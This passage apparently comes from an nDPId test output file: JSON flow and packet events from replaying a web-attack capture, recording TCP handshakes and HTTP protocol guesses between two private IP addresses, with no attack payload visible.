-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3638,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":1,"flow_last_seen":1499347404575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347404575,"pkt":"ABm5CmnxAMGxFOsxCABFAAA871lAAD4G1nasEAABwKgKMt4AAFBz\/X3KAAAAAKACchD7HQAAAgQFtAQCCAoBOpKTAAAAAAEDAwc="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3639,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":2,"flow_last_seen":1499347404575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347404575,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3gCf5c\/zc\/19y6AScSAkNgAAAgQFtAQCCAoD5GQJATqSkwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3641,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":3,"flow_last_seen":1499347404576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347404576,"pkt":"ABm5CmnxAMGxFOsxCABFAAA071pAAD4G1n2sEAABwKgKMt4AAFBz\/X3Ln+XP9IAQAOXDPQAAAQEICgE6kpMD5GQJ"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347276278,"flow_last_seen":1499347281695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55470,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347276278,"flow_last_seen":1499347281695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347277521,"flow_last_seen":1499347282696,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55484,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347277521,"flow_last_seen":1499347282696,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347280049,"flow_last_seen":1499347285697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55510,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347280049,"flow_last_seen":1499347285697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55510,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347281325,"flow_last_seen":1499347286697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55524,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347281325,"flow_last_seen":1499347286697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347282573,"flow_last_seen":1499347287697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55538,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347282573,"flow_last_seen":1499347287697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347407100,"flow_last_seen":1499347407100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347407100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56858,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":1,"flow_last_seen":1499347407100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347407100,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8oV1AAD4GJHOsEAABwKgKMt4aAFCK7TRXAAAAAKACchArEAAAAgQFtAQCCAoBOpUKAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3660,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":2,"flow_last_seen":1499347407100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347407100,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3hoI+EKiiu00WKAScSB18AAAAgQFtAQCCAoD5GaAATqVCgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3661,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":3,"flow_last_seen":1499347407101,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347407101,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0oV5AAD4GJHqsEAABwKgKMt4aAFCK7TRYCPhCo4AQAOUU9wAAAQEICgE6lQsD5GaA"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3668,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347408367,"flow_last_seen":1499347408367,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347408367,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56872,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3668,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":1,"flow_last_seen":1499347408367,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347408367,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lz9AAD4GLpGsEAABwKgKMt4oAFBdawF4AAAAAKACchCKJgAAAgQFtAQCCAoBOpZHAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3669,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":2,"flow_last_seen":1499347408367,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347408367,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3igaCcJ\/XWsBeaAScSBC2wAAAgQFtAQCCAoD5Ge9ATqWRwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3670,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":3,"flow_last_seen":1499347408368,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347408368,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0l0BAAD4GLpisEAABwKgKMt4oAFBdawF5GgnCgIAQAOXh4gAAAQEICgE6lkcD5Ge9"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3680,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347409644,"flow_last_seen":1499347409644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347409644,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56886,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3680,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":1,"flow_last_seen":1499347409644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347409644,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8tAhAAD4GEcisEAABwKgKMt42AFAiiCOOAAAAAKACchChpgAAAgQFtAQCCAoBOpeGAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3681,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":2,"flow_last_seen":1499347409644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347409644,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3ja0TSQNIogjj6AScSBdSgAAAgQFtAQCCAoD5Gj8ATqXhgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3682,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":3,"flow_last_seen":1499347409645,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347409645,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0tAlAAD4GEc+sEAABwKgKMt42AFAiiCOPtE0kDoAQAOX8UAAAAQEICgE6l4cD5Gj8"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3698,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347412160,"flow_last_seen":1499347412160,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347412160,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56912,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3698,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":1,"flow_last_seen":1499347412160,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347412160,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VIxAAD4GcUSsEAABwKgKMt5QAFAbQM13AAAAAKACchD8dQAAAgQFtAQCCAoBOpn7AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3699,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":2,"flow_last_seen":1499347412160,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347412160,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3lBjDHLSG0DNeKAScSC4IAAAAgQFtAQCCAoD5GtxATqZ+wEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3700,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":3,"flow_last_seen":1499347412161,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347412161,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VI1AAD4GcUusEAABwKgKMt5QAFAbQM14Ywxy04AQAOVXJwAAAQEICgE6mfwD5Gtx"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3710,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347413405,"flow_last_seen":1499347413405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347413405,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56926,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3710,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":1,"flow_last_seen":1499347413405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347413405,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8g\/NAAD4GQd2sEAABwKgKMt5eAFDJGhjAAAAAAKACchACDQAAAgQFtAQCCAoBOpszAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3711,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":2,"flow_last_seen":1499347413405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347413405,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3l7I3\/YFyRoYwaAScSDTeQAAAgQFtAQCCAoD5GyoATqbMwEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3712,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":3,"flow_last_seen":1499347413405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347413405,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0g\/RAAD4GQeSsEAABwKgKMt5eAFDJGhjByN\/2BoAQAOVygQAAAQEICgE6mzMD5Gyo"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347414709,"flow_last_seen":1499347414709,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":1,"flow_last_seen":1499347414709,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347414709,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LQhAAD4GmMisEAABwKgKMt5sAFBxqrFxAAAAAKACchC\/dwAAAgQFtAQCCAoBOpx5AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3724,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":2,"flow_last_seen":1499347414710,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347414710,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3mzO8Ll1caqxcqAScSDGHAAAAgQFtAQCCAoD5G3vATqceQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3725,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":3,"flow_last_seen":1499347414710,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347414710,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LQlAAD4GmM+sEAABwKgKMt5sAFBxqrFyzvC5doAQAOVlJAAAAQEICgE6nHkD5G3v"} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347228091,"flow_last_seen":1499347294990,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232370,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54956,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347285114,"flow_last_seen":1499347290698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55564,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347285114,"flow_last_seen":1499347290698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55564,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347286403,"flow_last_seen":1499347291698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55578,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347286403,"flow_last_seen":1499347291698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55578,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347287659,"flow_last_seen":1499347292698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55592,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347287659,"flow_last_seen":1499347292698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55592,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347290163,"flow_last_seen":1499347295228,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55618,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347290163,"flow_last_seen":1499347295228,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55618,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 